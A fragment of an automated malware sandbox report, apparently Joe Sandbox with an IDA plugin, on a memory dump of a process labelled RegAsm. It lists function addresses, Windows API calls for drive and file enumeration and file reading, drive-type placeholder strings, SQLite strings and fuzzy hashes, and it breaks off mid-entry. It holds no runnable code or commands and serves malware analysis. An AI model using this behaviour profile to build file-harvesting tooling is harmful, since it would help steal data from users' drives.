                                                                                                                                                                                                • Instruction ID: 002fcbd8f7205fbc13bd770a80986e578e3d678181764d1bc55e9c2bf6dfabae
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd7877f27da4e12b6a7fa398ac2b849e26e184e158dc6f262aeaf5f0e1ee4aec
                                                                                                                                                                                                • Instruction Fuzzy Hash: B1C133B59007419FCB218F24D941BEABBE1FF88314F04892EEAD5C6741E73AE545CB62
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004148B4
                                                                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00414916
                                                                                                                                                                                                • memset.MSVCRT ref: 00414935
                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 0041493E
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 0041495E
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 0041497C
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00414462: _EH_prolog.MSVCRT ref: 00414467
                                                                                                                                                                                                  • Part of subcall function 00414462: wsprintfA.USER32 ref: 0041448D
                                                                                                                                                                                                  • Part of subcall function 00414462: FindFirstFileA.KERNEL32(?,?), ref: 004144A4
                                                                                                                                                                                                  • Part of subcall function 00414462: memset.MSVCRT ref: 004144BB
                                                                                                                                                                                                  • Part of subcall function 00414462: memset.MSVCRT ref: 004144C9
                                                                                                                                                                                                  • Part of subcall function 00414462: StrCmpCA.SHLWAPI(?,00425798), ref: 004144E7
                                                                                                                                                                                                  • Part of subcall function 00414462: StrCmpCA.SHLWAPI(?,0042579C), ref: 00414501
                                                                                                                                                                                                  • Part of subcall function 00414462: wsprintfA.USER32 ref: 00414525
                                                                                                                                                                                                  • Part of subcall function 00414462: StrCmpCA.SHLWAPI(?,004254AE), ref: 00414536
                                                                                                                                                                                                  • Part of subcall function 00414462: wsprintfA.USER32 ref: 0041455C
                                                                                                                                                                                                  • Part of subcall function 00414462: memset.MSVCRT ref: 00414582
                                                                                                                                                                                                  • Part of subcall function 00414462: lstrcat.KERNEL32(?,?), ref: 00414594
                                                                                                                                                                                                  • Part of subcall function 00414462: strtok_s.MSVCRT ref: 004145CD
                                                                                                                                                                                                  • Part of subcall function 00414462: memset.MSVCRT ref: 004145E2
                                                                                                                                                                                                  • Part of subcall function 00414462: lstrcat.KERNEL32(?,?), ref: 004145F7
                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 0041499F
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00414A04
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                                                                                                                                • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                • API String ID: 2879972474-147700698
                                                                                                                                                                                                • Opcode ID: dea699d93c927df95dbeaac62c2028c535e1bb0fcf2e88180d2f4ce7ca951026
                                                                                                                                                                                                • Instruction ID: ce69cf5d705c68102b196c23c8b494e358ccabe1c6d03937ad45a626c66a4bdb
                                                                                                                                                                                                • Opcode Fuzzy Hash: dea699d93c927df95dbeaac62c2028c535e1bb0fcf2e88180d2f4ce7ca951026
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF5181B1900258AADF20EFB1DC46EEF7B7DEF51304F50042AF505A2192DB385A85CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00401167
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00421374,?,?,?,00421370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00421378), ref: 004013CA
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,0042137C), ref: 004013E4
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00421388,?,?,?,00421384,?,?,?,00421380,?,?), ref: 00401510
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042138C), ref: 00401832
                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,0042138C), ref: 00401841
                                                                                                                                                                                                • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406262
                                                                                                                                                                                                  • Part of subcall function 00413452: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004134DB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                • String ID: 7$\*.*
                                                                                                                                                                                                • API String ID: 40499504-4165053604
                                                                                                                                                                                                • Opcode ID: 132a3c05a3bd8f49082d57ca7b7f0a4d0874e8a83fa622a835e5837a80e4067f
                                                                                                                                                                                                • Instruction ID: 241fb47fad9d9fe79bc5b8d9739354b8124c7a3dae7548d836a13d901bd10fce
                                                                                                                                                                                                • Opcode Fuzzy Hash: 132a3c05a3bd8f49082d57ca7b7f0a4d0874e8a83fa622a835e5837a80e4067f
                                                                                                                                                                                                • Instruction Fuzzy Hash: CB628070904288EADB05E7E6C955FDDBBB86F29308F5044AEE446731C2DB781B4CCB66
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2d83f5e4cc54a4f29f218aecef91005d1f0713bc4be763d09e7c7efc2559b3ae
                                                                                                                                                                                                • Instruction ID: 745991f4c4d381fbc921c977ec3bb97d1aaa72c0998f4ba59e3061683bcd709f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d83f5e4cc54a4f29f218aecef91005d1f0713bc4be763d09e7c7efc2559b3ae
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1681D476604301ABEB10DF68DC81BAFB7E9FF88714F04082CFD8597280EA75E9458792
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: e
                                                                                                                                                                                                • API String ID: 0-4024072794
                                                                                                                                                                                                • Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                                                                                                                                                                • Instruction ID: 9cea7d969dc1b81ab4d16663abef2dbf52806b40d3dc2a7e714e9b6e1ab6dab1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 385146766043419FDB04CF2ADC81AB7BBE4FF89612F10856EF88186651E731F854CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %lld %lld
                                                                                                                                                                                                • API String ID: 0-3794783949
                                                                                                                                                                                                • Opcode ID: 3f360422da6e98d88b2934091241267ffbad8fb81053451ddf6cb0591c31ee52
                                                                                                                                                                                                • Instruction ID: f3d517cce546915d65a5ab8dea78f8fed844c9d0a06eb9671b70cdb7f8cf6105
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f360422da6e98d88b2934091241267ffbad8fb81053451ddf6cb0591c31ee52
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9731F7B5A012007BFA125B29DC06FDF7BAADFC5710F10881CFA9197251EB72E9119762
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5B15AC
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B5B1586
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5B15B1
                                                                                                                                                                                                • API called with NULL prepared statement, xrefs: 1B5B1571
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5B15A2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 348303c63962c7062fa6b6eeeb62d1a5e781a73ef18020e282f2b537f214fbb5
                                                                                                                                                                                                • Instruction ID: aa041f2701b8d0c771883ebec34edcb26328d45094be96393ccaa6c3b335b9fd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 348303c63962c7062fa6b6eeeb62d1a5e781a73ef18020e282f2b537f214fbb5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 24C117B5D207419BFBA08F26DE45BD777E6BF40354F04092CE88687241E775E449CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5BD5E7
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B5BD5C1
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5BD5EC
                                                                                                                                                                                                • API called with NULL prepared statement, xrefs: 1B5BD5AC
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5BD5DD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-860711957
                                                                                                                                                                                                • Opcode ID: 256a0055a9f24b31eca79f61afc13721af294c93d32401d1010663c607bd6889
                                                                                                                                                                                                • Instruction ID: 99c75a5ce8ad16ec78d379d2b1c32975d54ba05255daa4485d2512a6520d9d99
                                                                                                                                                                                                • Opcode Fuzzy Hash: 256a0055a9f24b31eca79f61afc13721af294c93d32401d1010663c607bd6889
                                                                                                                                                                                                • Instruction Fuzzy Hash: 52B1B1B59007419FF7108F24D985BD7B7E6BF84318F04492CE8998B281E776E44ACBA3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00409536
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00424E1C,?,?,00424BFA,00000000), ref: 004095B3
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E20), ref: 004095D0
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E24), ref: 004095EA
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00424E28,?,?,00424BFB), ref: 00409681
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 00409702
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004087A5: _EH_prolog.MSVCRT ref: 004087AA
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 004098EB
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004098FA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2015904956-0
                                                                                                                                                                                                • Opcode ID: 1af04abc06d6bc89197d961ed19f84c6bdc79f3b6133f4f9b5cbd85f798cdee3
                                                                                                                                                                                                • Instruction ID: 797d67777bfb35149a3cb65bc62c5bef38ee81358c28f2b680a1fecc1a85ea3b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1af04abc06d6bc89197d961ed19f84c6bdc79f3b6133f4f9b5cbd85f798cdee3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EC19974900248EADF40EBB6D946BDD7FB8AF05314F14456EE445B32C2DB785B08CBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00409951
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00424BFE,00000000,75B0AC90), ref: 004099B0
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E34), ref: 004099CD
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00424E38), ref: 004099E7
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00409F53
                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00409F62
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                • String ID: "$\*.*
                                                                                                                                                                                                • API String ID: 1275501236-2874818444
                                                                                                                                                                                                • Opcode ID: 025d80593547f85e3b26cbf902971ce118cb3220362a313577e05ad7aa6cd319
                                                                                                                                                                                                • Instruction ID: 442f60aee239f96d41c3c9371088bd5c07d6a5438acdaa834dec4229389d6373
                                                                                                                                                                                                • Opcode Fuzzy Hash: 025d80593547f85e3b26cbf902971ce118cb3220362a313577e05ad7aa6cd319
                                                                                                                                                                                                • Instruction Fuzzy Hash: FF127F71800148EADB45EBA2C956FEEBB78AF25304F1044AFA446731C2DF385B58DB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 46a9f175eab1b539870f142f9dfb566b4b1c34942289a01b7c360728d5e4df0b
                                                                                                                                                                                                • Instruction ID: c65e9ac8f140bf23fbee67753c74e42c39c4d80eb8ffd0f4b306e213d83dbf0c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a9f175eab1b539870f142f9dfb566b4b1c34942289a01b7c360728d5e4df0b
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F1F8B0A003429FE710AF65DC88A9B77F8EFD5319F44492DEC9482241E775E949CBE2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 09d3eab9d81a605ea2364a0aabb3d9955ba765fc9b51bd33753bdfecab41d682
                                                                                                                                                                                                • Instruction ID: 2bc78b00bb3030eda54bff3616216ecb47552252ae4f2e79a8b43db6b8a00dcc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 09d3eab9d81a605ea2364a0aabb3d9955ba765fc9b51bd33753bdfecab41d682
                                                                                                                                                                                                • Instruction Fuzzy Hash: D502B372904311AFE7159F64C880F9BB7E8BF88354F044A2DFD8997250EB75D898CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 69f01358d128d33b91acc77ed51355a689f7d338455a012a8a4b9effc4497dfa
                                                                                                                                                                                                • Instruction ID: 38c7d63cc03496debcdc4db3a80eb32b6021d1805d63a35497bf57b8361c38c3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f01358d128d33b91acc77ed51355a689f7d338455a012a8a4b9effc4497dfa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 92C19DB6E583415FF7008B18EC827DB7791EFC2318FA8096EE48587792F125E589C782
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B535264
                                                                                                                                                                                                • , xrefs: 1B535334
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                • API String ID: 0-69911113
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
